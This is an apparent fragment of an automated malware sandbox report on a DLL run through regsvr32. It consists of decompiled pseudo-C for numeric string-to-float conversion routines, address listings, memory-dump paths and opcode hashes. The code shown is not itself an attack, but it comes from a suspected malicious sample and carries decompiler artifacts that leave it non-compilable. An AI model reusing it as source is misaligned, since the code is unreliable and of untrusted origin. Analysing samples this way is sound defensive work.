											__eflags = 0x10070c80;
										}
										__eflags = _a56;
										_t150 =  ==  ? 0 : _a96 & 0x0000ffff;
										__eflags = r8d;
										_a96 =  ==  ? 0 : _a96 & 0x0000ffff;
										if(r8d == 0) {
											_t210 = 0;
											__eflags = 0;
										} else {
											r9d = 0xffff8000;
											do {
												_t242 = _t242 + 0x54;
												r8d = r8d >> 3;
												__eflags = r8d & 0x00000007;
												_a48 = r8d;
												_a64 = _t242;
												if((r8d & 0x00000007) == 0) {
													goto L100;
												}
												_t237 = _t224 + _t224 * 2;
												__eflags =  *((short*)(_t242 + _t237 * 4)) - 0x8000;
												_t266 = _t242 + _t237 * 4;
												if( *((short*)(_t242 + _t237 * 4)) >= 0x8000) {
													_t32 =  &_a112; // 0x71
													_t237 = _t32;
													 *_t237 =  *_t266;
													_t181 = _t266[2];
													_t34 =  &_a112; // 0x71
													_t266 = _t34;
													 *(_t237 + 8) = _t181;
													_t224 = _a112 >> 0x10;
													_t182 = _t181 - 1;
													__eflags = _t182;
													_a114 = _t182;
												}
												_t190 = _t266[2] & 0x0000ffff;
												_t154 = _a106 & 0x0000ffff;
												r15d = 0;
												_t191 = _t190 & 0x00007fff;
												_a80 = 0;
												_t155 = _t154 & 0x00007fff;
												_a84 = 0;
												_t205 = (_t190 & 0x0000ffff ^ _t154) & 0x00008000;
												__eflags = _t155 - 0x7fff;
												_a88 = 0;
												_a56 = _t205;
												_t211 = _t224 + _t237;
												if(_t155 >= 0x7fff) {
													L99:
													__eflags = _t205;
													_t242 = _a64;
													_t157 =  !=  ? r9d : 0x7fff8000;
													_a100 = 0;
													_a96 = 0;
													_a104 =  !=  ? r9d : 0x7fff8000;
												} else {
													__eflags = _t191 - 0x7fff;
													if(_t191 >= 0x7fff) {
														goto L99;
													}
													__eflags = _t211 - 0xbffd;
													if(_t211 > 0xbffd) {
														goto L99;
													}
													__eflags = _t211 - 0x3fbf;
													if(_t211 > 0x3fbf) {
														__eflags = _t155;
														if(_t155 != 0) {
															L51:
															__eflags = _t191;
															if(_t191 != 0) {
																L56:
																r13d = 0;
																_t243 =  &_a84;
																r12d = 5;
																do {
																	__eflags = r12d;
																	_t188 = r12d;
																	_t238 = _t263 + _t263;
																	if(r12d <= 0) {
																		goto L71;
																	}
																	_t62 =  &(_t266[2]); // 0x9
																	_t258 = _t62;
																	_t64 = _t238 + 0x60; // 0x65
																	_t261 = _t251 + _t64;
																	_t215 = r13d & 0x00000001;
																	__eflags = _t215;
																	do {
																		_t193 = ( *_t261 & 0x0000ffff) * ( *_t258 & 0x0000ffff);
																		__eflags = _t215;
																		if(_t215 == 0) {
																			r8d = 0;
																			r9d = _t224 + _t238;
																			__eflags = r9d -  *(_t243 - 4);
																			if(r9d <  *(_t243 - 4)) {
																				L66:
																				r8d = 1;
																				L67:
																				 *(_t243 - 4) = r9d;
																				goto L68;
																			}
																			__eflags = r9d - _t193;
																			if(r9d >= _t193) {
																				goto L67;
																			}
																			goto L66;
																		}
																		r8d = 0;
																		r9d = _t224 + _t238;
																		__eflags = r9d -  *(_t243 - 4);
																		if(r9d <  *(_t243 - 4)) {
																			L62:
																			r8d = 1;
																			L63:
																			 *(_t243 - 4) = r9d;
																			goto L68;
																		}
																		__eflags = r9d - _t193;
																		if(r9d >= _t193) {
																			goto L63;
																		}
																		goto L62;
																		L68:
																		__eflags = r8d;
																		if(r8d != 0) {
																			 *_t243 =  *_t243 + 1;
																			__eflags =  *_t243;
																		}
																		_t188 = _t188 - 1;
																		_t261 =  &(_t261[1]);
																		_t258 = _t258 - 2;
																		__eflags = _t188;
																	} while (_t188 > 0);
																	L71:
																	r12d = r12d - 1;
																	_t243 =  &(_t243[0]);
																	r13d = r13d + 1;
																	__eflags = r12d;
																} while (r12d > 0);
																_t212 = _t211 + 0xc002;
																__eflags = _t212;
																if(__eflags <= 0) {
																	r8d = _a88;
																	_t206 = _a84;
																	r9d = _a80;
																	L86:
																	_t212 = _t212 + 0xffff;
																	__eflags = _t212;
																	if(_t212 >= 0) {
																		L78:
																		_t159 = _a80 & 0x0000ffff;
																		L79:
																		__eflags = _t159 - 0x8000;
																		if(_t159 > 0x8000) {
																			L81:
																			_t160 = _a82;
																			__eflags = _t160 - 0xffffffff;
																			if(_t160 != 0xffffffff) {
																				_t161 = _t160 + 1;
																				__eflags = _t161;
																				_a82 = _t161;
																				_t206 = _a84;
																			} else {
																				_t165 = _a86;
																				_a82 = 0;
																				__eflags = _t165 - 0xffffffff;
																				if(_t165 != 0xffffffff) {
																					_a86 = _t165 + 1;
																					r8d = _a88;
																					_t206 = _a84;
																				} else {
																					_t167 = _a90 & 0x0000ffff;
																					_a86 = 0;
																					__eflags = _t167 - 0xffff;
																					if(_t167 != 0xffff) {
																						_t206 = _a84;
																						_a90 = _t167 + 1;
																						r8d = _a88;
																					} else {
																						_t206 = _a84;
																						_a90 = 0x8000;
																						r8d = _a88;
																						_t212 = _t212 + 1;
																					}
																				}
																			}
																			L96:
																			__eflags = _t212 - 0x7fff;
																			if(_t212 < 0x7fff) {
																				_a98 = _t206;
																				_t242 = _a64;
																				_a102 = r8d;
																				r8d = _a48;
																				_a96 = _a82 & 0x0000ffff;
																				_a106 = _t212 | _a56;
																				r9d = 0xffff8000;
																			} else {
																				__eflags = _a56;
																				_t242 = _a64;
																				r8d = _a48;
																				r9d = 0xffff8000;
																				_a100 = 0;
																				_t164 =  !=  ? r9d : 0x7fff8000;
																				_a96 = 0;
																				_a104 =  !=  ? r9d : 0x7fff8000;
																			}
																			goto L100;
																		}
																		r9d = r9d & 0x0001ffff;
																		__eflags = r9d - 0x18000;
																		if(r9d != 0x18000) {
																			goto L96;
																		}
																		goto L81;
																	}
																	r10d =  ~(_t212 & 0x0000ffff) & 0x0000ffff;
																	_t212 = _t212 + r10w;
																	__eflags = _t212;
																	do {
																		__eflags = _a80 & 0x00000001;
																		if((_a80 & 0x00000001) != 0) {
																			r15d = r15d + 1;
																			__eflags = r15d;
																		}
																		r9d = r9d >> 1;
																		r9d = r9d | _t206 << 0x0000001f;
																		r8d = r8d >> 1;
																		_t206 = _t206 >> 0x00000001 | r8d << 0x0000001f;
																		_t258 = _t258 - 1;
																		__eflags = _t258;
																		_a80 = r9d;
																	} while (_t258 != 0);
																	__eflags = r15d;
																	_a84 = _t206;
																	_a88 = r8d;
																	if(r15d == 0) {
																		goto L78;
																	}
																	_t159 = r9w | 0x00000001;
																	_a80 = _t159;
																	r9d = _a80;
																	goto L79;
																}
																r8d = _a88;
																_t206 = _a84;
																r9d = _a80;
																while(1) {
																	asm("inc ecx");
																	if(__eflags < 0) {
																		break;
																	}
																	r8d = r8d + r8d;
																	_t197 = _t206 >> 0x1f;
																	r9d = r9d + r9d;
																	_t206 = _t206 + _t206 | r9d >> 0x0000001f;
																	r8d = r8d | _t197;
																	_t212 = _t212 + 0xffff;
																	_a84 = _t206;
																	_a88 = r8d;
																	__eflags = _t212;
																	_a80 = r9d;
																	if(__eflags > 0) {
																		continue;
																	}
																	goto L86;
																}
																__eflags = _t212;
																if(_t212 <= 0) {
																	goto L86;
																}
																goto L78;
															}
															_t211 = _t211 + 1;
															asm("btr eax, 0x1f");
															__eflags = _t266[2];
															if(_t266[2] != 0) {
																goto L56;
															}
															__eflags = _t266[1];
															if(_t266[1] != 0) {
																goto L56;
															}
															__eflags =  *_t266;
															if( *_t266 != 0) {
																goto L56;
															}
															_t242 = _a64;
															_a104 = 0;
															_a100 = 0;
															_a96 = 0;
															goto L100;
														}
														_t211 = _t211 + 1;
														asm("btr eax, 0x1f");
														__eflags = _a104;
														if(_a104 != 0) {
															goto L51;
														}
														__eflags = _a100;
														if(_a100 != 0) {
															goto L51;
														}
														__eflags = _a96;
														if(_a96 != 0) {
															goto L51;
														}
														_t242 = _a64;
														_a106 = 0;
														goto L100;
													}
													_t242 = _a64;
													_a104 = 0;
													_a100 = 0;
													_a96 = 0;
												}
												L100:
												__eflags = r8d;
											} while (r8d != 0);
											_t210 = 0;
										}
										goto L103;
									}
								}
								do {
									_t260 = _t260 - 1;
									r10d = r10d + 0xffffffff;
									_t187 = _t187 + 1;
									__eflags =  *_t260;
								} while ( *_t260 == 0);
								goto L24;
							}
							_t183 = _a151 & 0x000000ff;
							__eflags = _t183 - 5;
							if(_t183 >= 5) {
								_t184 = _t183 + 1;
								__eflags = _t184;
								_a151 = _t184;
							}
							_t259 = _t259 - 1;
							r10d = 0x18;
							_t187 = _t187 + 1;
							goto L21;
						}
						goto __rcx;
					}
					r9d = 4;
					do {
						goto L1;
					} while (r9d != 0xa);
					_t210 = 0;
					__eflags = 0;
					goto L14;
				} else {
					while(_t200 <= 0x39) {
						if(r10d >= 0x19) {
							_t187 = _t187 + 1;
							__eflags = _t187;
						} else {
							r10d = r10d + 1;
							 *_t259 = _t200 - 0x30;
							_t259 = _t259 + _t249;
						}
						_t200 =  *_t253;
						_t253 =  &(_t253[_t249]);
						if(_t200 >= 0x30) {
							continue;
						} else {
							goto L8;
						}
					}
					goto L8;
				}
				L1:
				_t200 =  *_t253 & 0x000000ff;
				_t253 =  &(_t253[1]);
				if(r9d <= 0xb) {
					goto __rcx;
				}
				__eflags = r9d - 0xa;
			}



















































                                                                              0x1004ee78
                                                                              0x1004ee78
                                                                              0x1004ee78
                                                                              0x1004ee78
                                                                              0x1004ee78
                                                                              0x1004ee78
                                                                              0x1004ee78
                                                                              0x1004ee80
                                                                              0x1004eea8
                                                                              0x1004eeb2
                                                                              0x1004eeb7
                                                                              0x1004eed1
                                                                              0x1004eed4
                                                                              0x1004f172
                                                                              0x1004f175
                                                                              0x1004f11f
                                                                              0x1004f11f
                                                                              0x1004f121
                                                                              0x1004f125
                                                                              0x1004f706
                                                                              0x1004f709
                                                                              0x1004f70b
                                                                              0x1004f710
                                                                              0x1004f710
                                                                              0x1004f713
                                                                              0x1004f713
                                                                              0x1004f716
                                                                              0x1004f716
                                                                              0x1004f71b
                                                                              0x1004f71b
                                                                              0x1004f720
                                                                              0x1004f727
                                                                              0x1004f72b
                                                                              0x1004f72f
                                                                              0x1004f77b
                                                                              0x1004f78a
                                                                              0x1004f78a
                                                                              0x1004f12b
                                                                              0x1004f12f
                                                                              0x1004f20f
                                                                              0x1004f212
                                                                              0x1004f6ff
                                                                              0x1004f702
                                                                              0x00000000
                                                                              0x1004f702
                                                                              0x1004f218
                                                                              0x1004f218
                                                                              0x1004f21c
                                                                              0x1004f220
                                                                              0x1004f241
                                                                              0x1004f241
                                                                              0x1004f246
                                                                              0x1004f251
                                                                              0x1004f256
                                                                              0x1004f259
                                                                              0x1004f265
                                                                              0x1004f25b
                                                                              0x1004f25b
                                                                              0x1004f260
                                                                              0x1004f260
                                                                              0x1004f26a
                                                                              0x1004f26d
                                                                              0x1004f270
                                                                              0x1004f272
                                                                              0x1004f272
                                                                              0x1004f272
                                                                              0x1004f27a
                                                                              0x1004f27d
                                                                              0x1004f27f
                                                                              0x1004f27f
                                                                              0x1004f27f
                                                                              0x1004f287
                                                                              0x1004f28e
                                                                              0x1004f6e9
                                                                              0x1004f6eb
                                                                              0x1004f6ef
                                                                              0x1004f6f5
                                                                              0x1004f6fa
                                                                              0x00000000
                                                                              0x1004f294
                                                                              0x1004f294
                                                                              0x1004f29b
                                                                              0x1004f6dd
                                                                              0x1004f6e0
                                                                              0x1004f6e2
                                                                              0x00000000
                                                                              0x1004f6e2
                                                                              0x1004f2a8
                                                                              0x1004f2ac
                                                                              0x1004f2af
                                                                              0x1004f6c6
                                                                              0x1004f6ca
                                                                              0x1004f6cf
                                                                              0x1004f6d3
                                                                              0x1004f6d8
                                                                              0x00000000
                                                                              0x1004f6d8
                                                                              0x1004f2b5
                                                                              0x1004f2b8
                                                                              0x1004f2c1
                                                                              0x1004f2c4
                                                                              0x1004f2c4
                                                                              0x1004f2c4
                                                                              0x1004f2cd
                                                                              0x1004f2d7
                                                                              0x1004f2db
                                                                              0x1004f2de
                                                                              0x1004f2e3
                                                                              0x1004f6c4
                                                                              0x1004f6c4
                                                                              0x1004f2e9
                                                                              0x1004f2e9
                                                                              0x1004f2f0
                                                                              0x1004f2f3
                                                                              0x1004f2f7
                                                                              0x1004f2fb
                                                                              0x1004f2fe
                                                                              0x1004f303
                                                                              0x1004f308
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f310
                                                                              0x1004f314
                                                                              0x1004f31a
                                                                              0x1004f31e
                                                                              0x1004f323
                                                                              0x1004f323
                                                                              0x1004f328
                                                                              0x1004f32b
                                                                              0x1004f32f
                                                                              0x1004f32f
                                                                              0x1004f334
                                                                              0x1004f33c
                                                                              0x1004f340
                                                                              0x1004f340
                                                                              0x1004f343
                                                                              0x1004f343
                                                                              0x1004f347
                                                                              0x1004f34c
                                                                              0x1004f351
                                                                              0x1004f357
                                                                              0x1004f35c
                                                                              0x1004f363
                                                                              0x1004f367
                                                                              0x1004f36b
                                                                              0x1004f370
                                                                              0x1004f374
                                                                              0x1004f378
                                                                              0x1004f37d
                                                                              0x1004f380
                                                                              0x1004f69a
                                                                              0x1004f69a
                                                                              0x1004f69d
                                                                              0x1004f6a7
                                                                              0x1004f6ab
                                                                              0x1004f6af
                                                                              0x1004f6b3
                                                                              0x1004f386
                                                                              0x1004f386
                                                                              0x1004f38b
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f391
                                                                              0x1004f396
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f39c
                                                                              0x1004f3a1
                                                                              0x1004f3b9
                                                                              0x1004f3bc
                                                                              0x1004f3e9
                                                                              0x1004f3e9
                                                                              0x1004f3ec
                                                                              0x1004f41f
                                                                              0x1004f41f
                                                                              0x1004f422
                                                                              0x1004f427
                                                                              0x1004f430
                                                                              0x1004f430
                                                                              0x1004f438
                                                                              0x1004f43b
                                                                              0x1004f43e
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f443
                                                                              0x1004f443
                                                                              0x1004f447
                                                                              0x1004f447
                                                                              0x1004f44c
                                                                              0x1004f44c
                                                                              0x1004f450
                                                                              0x1004f458
                                                                              0x1004f45b
                                                                              0x1004f45d
                                                                              0x1004f482
                                                                              0x1004f485
                                                                              0x1004f489
                                                                              0x1004f48c
                                                                              0x1004f493
                                                                              0x1004f493
                                                                              0x1004f499
                                                                              0x1004f499
                                                                              0x00000000
                                                                              0x1004f499
                                                                              0x1004f48e
                                                                              0x1004f491
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f491
                                                                              0x1004f462
                                                                              0x1004f465
                                                                              0x1004f469
                                                                              0x1004f46c
                                                                              0x1004f473
                                                                              0x1004f473
                                                                              0x1004f479
                                                                              0x1004f479
                                                                              0x00000000
                                                                              0x1004f479
                                                                              0x1004f46e
                                                                              0x1004f471
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f49d
                                                                              0x1004f49d
                                                                              0x1004f4a0
                                                                              0x1004f4a2
                                                                              0x1004f4a2
                                                                              0x1004f4a2
                                                                              0x1004f4a6
                                                                              0x1004f4a9
                                                                              0x1004f4ad
                                                                              0x1004f4b1
                                                                              0x1004f4b1
                                                                              0x1004f4b5
                                                                              0x1004f4b5
                                                                              0x1004f4b9
                                                                              0x1004f4bd
                                                                              0x1004f4c1
                                                                              0x1004f4c1
                                                                              0x1004f4ca
                                                                              0x1004f4cf
                                                                              0x1004f4d2
                                                                              0x1004f58d
                                                                              0x1004f592
                                                                              0x1004f596
                                                                              0x1004f59b
                                                                              0x1004f59b
                                                                              0x1004f59b
                                                                              0x1004f5a0
                                                                              0x1004f524
                                                                              0x1004f524
                                                                              0x1004f529
                                                                              0x1004f529
                                                                              0x1004f52d
                                                                              0x1004f543
                                                                              0x1004f543
                                                                              0x1004f547
                                                                              0x1004f54a
                                                                              0x1004f62d
                                                                              0x1004f62d
                                                                              0x1004f630
                                                                              0x1004f634
                                                                              0x1004f550
                                                                              0x1004f550
                                                                              0x1004f554
                                                                              0x1004f558
                                                                              0x1004f55b
                                                                              0x1004f61e
                                                                              0x1004f622
                                                                              0x1004f627
                                                                              0x1004f561
                                                                              0x1004f561
                                                                              0x1004f566
                                                                              0x1004f56a
                                                                              0x1004f56e
                                                                              0x1004f607
                                                                              0x1004f60f
                                                                              0x1004f614
                                                                              0x1004f574
                                                                              0x1004f574
                                                                              0x1004f578
                                                                              0x1004f57f
                                                                              0x1004f584
                                                                              0x1004f584
                                                                              0x1004f56e
                                                                              0x1004f55b
                                                                              0x1004f638
                                                                              0x1004f638
                                                                              0x1004f63d
                                                                              0x1004f675
                                                                              0x1004f679
                                                                              0x1004f67e
                                                                              0x1004f683
                                                                              0x1004f688
                                                                              0x1004f68d
                                                                              0x1004f692
                                                                              0x1004f63f
                                                                              0x1004f63f
                                                                              0x1004f644
                                                                              0x1004f649
                                                                              0x1004f653
                                                                              0x1004f659
                                                                              0x1004f65d
                                                                              0x1004f661
                                                                              0x1004f665
                                                                              0x1004f665
                                                                              0x00000000
                                                                              0x1004f63d
                                                                              0x1004f52f
                                                                              0x1004f536
                                                                              0x1004f53d
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f53d
                                                                              0x1004f5a8
                                                                              0x1004f5ac
                                                                              0x1004f5ac
                                                                              0x1004f5b0
                                                                              0x1004f5b0
                                                                              0x1004f5b5
                                                                              0x1004f5b7
                                                                              0x1004f5b7
                                                                              0x1004f5b7
                                                                              0x1004f5c0
                                                                              0x1004f5cb
                                                                              0x1004f5ce
                                                                              0x1004f5d1
                                                                              0x1004f5d3
                                                                              0x1004f5d3
                                                                              0x1004f5d7
                                                                              0x1004f5d7
                                                                              0x1004f5de
                                                                              0x1004f5e1
                                                                              0x1004f5e5
                                                                              0x1004f5ea
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f5f4
                                                                              0x1004f5f8
                                                                              0x1004f5fd
                                                                              0x00000000
                                                                              0x1004f5fd
                                                                              0x1004f4d8
                                                                              0x1004f4dd
                                                                              0x1004f4e1
                                                                              0x1004f4e6
                                                                              0x1004f4e6
                                                                              0x1004f4eb
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f4f2
                                                                              0x1004f4fa
                                                                              0x1004f4fd
                                                                              0x1004f500
                                                                              0x1004f502
                                                                              0x1004f505
                                                                              0x1004f50a
                                                                              0x1004f50e
                                                                              0x1004f513
                                                                              0x1004f516
                                                                              0x1004f51b
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f51d
                                                                              0x1004f51f
                                                                              0x1004f522
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f522
                                                                              0x1004f3f2
                                                                              0x1004f3f6
                                                                              0x1004f3fa
                                                                              0x1004f3fc
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f3fe
                                                                              0x1004f402
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f404
                                                                              0x1004f407
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f409
                                                                              0x1004f40e
                                                                              0x1004f412
                                                                              0x1004f416
                                                                              0x00000000
                                                                              0x1004f416
                                                                              0x1004f3c2
                                                                              0x1004f3c6
                                                                              0x1004f3ca
                                                                              0x1004f3cc
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f3ce
                                                                              0x1004f3d2
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f3d4
                                                                              0x1004f3d8
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f3da
                                                                              0x1004f3df
                                                                              0x00000000
                                                                              0x1004f3df
                                                                              0x1004f3a3
                                                                              0x1004f3a8
                                                                              0x1004f3ac
                                                                              0x1004f3b0
                                                                              0x1004f3b0
                                                                              0x1004f6b7
                                                                              0x1004f6b7
                                                                              0x1004f6b7
                                                                              0x1004f6c0
                                                                              0x1004f6c0
                                                                              0x00000000
                                                                              0x1004f2e3
                                                                              0x1004f28e
                                                                              0x1004f230
                                                                              0x1004f230
                                                                              0x1004f234
                                                                              0x1004f238
                                                                              0x1004f23b
                                                                              0x1004f23b
                                                                              0x00000000
                                                                              0x1004f230
                                                                              0x1004f135
                                                                              0x1004f13d
                                                                              0x1004f13f
                                                                              0x1004f141
                                                                              0x1004f141
                                                                              0x1004f143
                                                                              0x1004f143
                                                                              0x1004f14a
                                                                              0x1004f14e
                                                                              0x1004f154
                                                                              0x00000000
                                                                              0x1004f154
                                                                              0x1004eef5
                                                                              0x1004eef5
                                                                              0x1004eeb9
                                                                              0x1004ecc0
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f11d
                                                                              0x1004f11d
                                                                              0x00000000
                                                                              0x1004ee82
                                                                              0x1004ee82
                                                                              0x1004ee8b
                                                                              0x1004ee9b
                                                                              0x1004ee9b
                                                                              0x1004ee8d
                                                                              0x1004ee90
                                                                              0x1004ee93
                                                                              0x1004ee96
                                                                              0x1004ee96
                                                                              0x1004ee9d
                                                                              0x1004eea0
                                                                              0x1004eea6
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004eea6
                                                                              0x00000000
                                                                              0x1004ee82
                                                                              0x1004ecc0
                                                                              0x1004ecc0
                                                                              0x1004ecc4
                                                                              0x1004eccc
                                                                              0x1004ece6
                                                                              0x1004ece6
                                                                              0x1004f113

                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 5a22c39815a8cc4e38f27ce5466f6e8781b7e69cd0bbc7f7f60e7947d93c4ee9
                                                                              • Instruction ID: 76ae317126a71351c650a6a6c964f9aa8fce5d4a9b3506aa0d7b863d57943a68
                                                                              • Opcode Fuzzy Hash: 5a22c39815a8cc4e38f27ce5466f6e8781b7e69cd0bbc7f7f60e7947d93c4ee9
                                                                              • Instruction Fuzzy Hash: C06136B76187C4C6D761CF2AE0443AAB7A1F395780FA1412AEB8983B55DB7DC445CF08
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000000018002A840 Relevance: .2, Instructions: 180COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.943069664.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 1c8b8be56366865ecfdde9c8b2ec8895e219799960cb59c8d6409a7e773344f9
                                                                              • Instruction ID: 37013b96f87cdafdf9e9430ef7fa874701b46d6ad591addafa58d16b7588ecf0
                                                                              • Opcode Fuzzy Hash: 1c8b8be56366865ecfdde9c8b2ec8895e219799960cb59c8d6409a7e773344f9
                                                                              • Instruction Fuzzy Hash: 7E811370D047098FDB89CFA8D4856EEBBF1FB48314F14812EE846B6250CB788A49CF59
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 1004F1B1 Relevance: .2, Instructions: 173COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 89%
                                                                              			E1004F1B1(void* __ebx, intOrPtr __edx, void* __ebp, unsigned long long __rax, void* __rcx, void* __rdi, intOrPtr* __r8, void* __r11, void* __r12, long long* __r13, signed int _a48, signed int _a52, signed int _a56, long long _a64, signed int* _a72, unsigned int _a80, signed short _a82, signed int _a84, signed int _a86, signed int _a88, signed int _a90, signed int _a96, signed int _a98, signed int _a100, signed int _a102, unsigned int _a104, signed int _a106, unsigned int _a112, intOrPtr _a114, char _a128, signed int _a151, signed int _a160, void* _a184, void* _a192, void* _a200, void* _a208, void* _a216, void* _a224, void* _a232, void* _a240, intOrPtr _a288, intOrPtr _a296) {
				unsigned int _t139;
				signed short _t150;
				signed short _t151;
				signed short _t155;
				signed short _t156;
				signed int _t157;
				signed int _t161;
				signed int _t163;
				signed int _t177;
				signed int _t179;
				void* _t181;
				signed int _t182;
				signed int _t183;
				signed short _t184;
				signed short _t185;
				signed int _t187;
				signed int _t191;
				intOrPtr _t192;
				signed int _t193;
				signed short _t197;
				signed int _t198;
				signed int _t201;
				void* _t202;
				signed int _t203;
				signed int _t206;
				void* _t207;
				unsigned long long _t238;
				void* _t241;
				signed long long _t247;
				void* _t248;
				void* _t249;
				long long _t251;
				signed int* _t252;
				void* _t254;
				void* _t256;
				signed long long _t259;
				intOrPtr* _t261;
				void* _t263;
				signed int* _t264;
				void* _t265;
				signed int _t266;
				void* _t267;
				char* _t268;
				signed short* _t269;
				void* _t270;
				long long* _t272;
				signed int* _t275;

				_t272 = __r13;
				_t270 = __r12;
				_t267 = __r11;
				_t261 = __r8;
				_t254 = __rdi;
				_t238 = __rax;
				_t207 = __ebp;
				_t192 = __edx;
				_t181 = __ebx;
				_t201 = 0;
				_t1 = _t254 + 1; // 0x1
				r12d = _t1;
				_a48 = 0;
				if(__edx < 0x30) {
					L11:
					__eflags = _t192 - 0x30;
					if(_t192 < 0x30) {
						L14:
						_t261 = _t261 - _t270;
						 *_t272 = _t261;
						if(_t207 == 0) {
							r8d = _t201;
							_t193 = _t201;
							_t201 = 4;
							goto L103;
						} else {
							if(r10d <= 0x18) {
								goto L15;
							}
							_t179 = _a151 & 0x000000ff;
							if(_t179 >= 5) {
								_a151 = _t179 + 1;
							}
							_t267 = _t267 - 1;
							r10d = 0x18;
							_t181 = _t181 + 1;
							L16:
							_t268 = _t267 - 1;
							if( *_t268 != 0) {
								L19:
								_t12 =  &_a96; // 0x61
								_t13 =  &_a128; // 0x81
								E10052690(r10d, _t241, _t13, _t249, _t254, _t256, _t12, _t263, _t265, _t268);
								if(r14d >= 0) {
									r8d = _a48;
								} else {
									r8d = _a48;
									r8d =  ~r8d;
								}
								r8d = r8d + _t181;
								if(r12d == 0) {
									r8d = r8d + _a288;
								}
								if(r15d == 0) {
									r8d = r8d - _a296;
								}
								if(r8d > 0x1450) {
									_t193 = _t201;
									_t139 = 0x7fff;
									r8d = 0x80000000;
									_t201 = 2;
									_t183 = 0;
									goto L104;
								} else {
									if(r8d < 0xffffebb0) {
										r8d = _t201;
										_t193 = _t201;
										_t201 = 1;
										L103:
										_t183 = 0;
										_t139 = 0;
										__eflags = 0;
										L104:
										_t264 = _a72;
										_t264[2] = _t139 | _a52;
										 *_t264 = _t183;
										_t264[0] = _t193;
										_t264[1] = r8d;
										return E10038D20(_t183, _a160 ^ _t259);
									}
									_t251 = 0x10070ac0;
									if(r8d == 0) {
										L98:
										_t183 = _a96 & 0x0000ffff;
										_t193 = _a98;
										r8d = _a102;
										_t139 = _a104 >> 0x10;
										goto L104;
									}
									if(r8d < 0) {
										r8d =  ~r8d;
										_t251 = 0x10070c20;
									}
									_t146 =  ==  ? 0 : _a96 & 0x0000ffff;
									_a96 =  ==  ? 0 : _a96 & 0x0000ffff;
									if(r8d == 0) {
										_t201 = 0;
										__eflags = 0;
									} else {
										r9d = 0xffff8000;
										do {
											_t251 = _t251 + 0x54;
											r8d = r8d >> 3;
											_a48 = r8d;
											_a64 = _t251;
											if((r8d & 0x00000007) == 0) {
												goto L95;
											}
											_t247 = _t238 + _t238 * 2;
											_t275 = _t251 + _t247 * 4;
											if( *((short*)(_t251 + _t247 * 4)) >= 0x8000) {
												_t29 =  &_a112; // 0x71
												_t247 = _t29;
												 *_t247 =  *_t275;
												_t177 = _t275[2];
												_t31 =  &_a112; // 0x71
												_t275 = _t31;
												 *(_t247 + 8) = _t177;
												_t238 = _a112 >> 0x10;
												_a114 = _t177 - 1;
											}
											_t184 = _t275[2] & 0x0000ffff;
											_t150 = _a106 & 0x0000ffff;
											r15d = 0;
											_t185 = _t184 & 0x00007fff;
											_a80 = 0;
											_t151 = _t150 & 0x00007fff;
											_a84 = 0;
											_t197 = (_t184 & 0x0000ffff ^ _t150) & 0x00008000;
											_a88 = 0;
											_a56 = _t197;
											_t202 = _t238 + _t247;
											if(_t151 >= 0x7fff || _t185 >= 0x7fff || _t202 > 0xbffd) {
												__eflags = _t197;
												_t251 = _a64;
												_t153 =  !=  ? r9d : 0x7fff8000;
												_a100 = 0;
												_a96 = 0;
												_a104 =  !=  ? r9d : 0x7fff8000;
											} else {
												if(_t202 > 0x3fbf) {
													__eflags = _t151;
													if(_t151 != 0) {
														L46:
														__eflags = _t185;
														if(_t185 != 0) {
															L51:
															r13d = 0;
															_t252 =  &_a84;
															r12d = 5;
															do {
																__eflags = r12d;
																_t182 = r12d;
																_t248 = _t272 + _t272;
																if(r12d <= 0) {
																	goto L66;
																}
																_t59 =  &(_t275[2]); // 0x9
																_t266 = _t59;
																_t61 = _t248 + 0x60; // 0x65
																_t269 = _t259 + _t61;
																_t206 = r13d & 0x00000001;
																__eflags = _t206;
																do {
